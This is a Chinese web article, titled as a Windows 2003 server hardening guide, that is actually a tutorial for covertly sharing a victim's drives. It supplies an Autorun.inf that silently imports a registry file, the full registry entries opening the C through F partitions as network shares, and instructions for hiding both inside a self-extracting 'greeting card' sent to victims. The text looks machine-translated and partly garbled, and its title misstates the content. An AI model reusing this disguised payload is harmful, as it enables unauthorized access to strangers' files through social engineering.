系统安全之WIN2003服务器安全加固方案

用自解压包擦除别人的硬盘，相信大家都会。我给你介绍一种用自解压包入侵的方法。

如果把木马绑在别人身上，只要有点常识的人都有杀毒软件就能识破。如果不使用木马，可以使用批量炸弹、碎片化的对象文件，或者自行导入的注册表文件来实现各种攻击。

将下面两行另存为Autorun.inf

[自动运行]

open=regedit /s Autorun.reg

将以下段落另存为Autorun.reg

注册表4蠕虫网络技术http://www.chinaccna.com

[HKEY _ LOCAL _ MACHINE \ Software \ Microsoft \ Windows \ current version \ Network \ Lanman \ c $]

" Path"="c:\ "

"备注" = " "

" Type"=dword:00000000

" Flags"=dword:00000192

" Parm1enc " =十六进制:

" Parm2enc " =十六进制:

[HKEY _ LOCAL _ MACHINE \ Software \ Microsoft \ Windows \ current version \ Network \ Lanman \ D $]

" Path"="D:\ "

"备注" = " "

" Type"=dword:00000000

" Flags"=dword:00000192

" Parm1enc " =十六进制:

" Parm2enc " =十六进制:

[HKEY _ LOCAL _ MACHINE \ Software \ Microsoft \ Windows \ current version \ Network \ Lanman \ E $]

" Path"="E:\ "

"备注" = " "

" Type"=dword:00000000

" Flags"=dword:00000192

" Parm1enc " =十六进制:

" Parm2enc " =十六进制:

[HKEY _ LOCAL _ MACHINE \ Software \ Microsoft \ Windows \ current version \ Network \ Lanman \ F $]

" Path"="F:\ "

"备注" = " "

" Type"=dword:00000000

" Flags"=dword:00000192

" Parm1enc " =十六进制:

" Parm2enc"=hex:

比如在如今这个电子贺卡满天飞的时代，你可以把自己的自我解压包命名为“猴年贺卡”，里面放一张真正的贺卡。顺便把上面两个文档打包，注意指定文档的解包路径。当贺卡接收者点击自解压包时，真正的贺卡被解压，两个文件被悄悄解压到指定位置。Autorun.inf必须解析到一个分区的根目录，名称不能更改，可以设置文件隐藏属性。

Autorun.reg的文件名和发布目录可以任意，可以更好的隐藏。注意，Autorun.inf指向目录的正确位置。

当受害者用Autorun.inf双击分区时，其硬盘的C、D、E、F分区被打开供公众享用。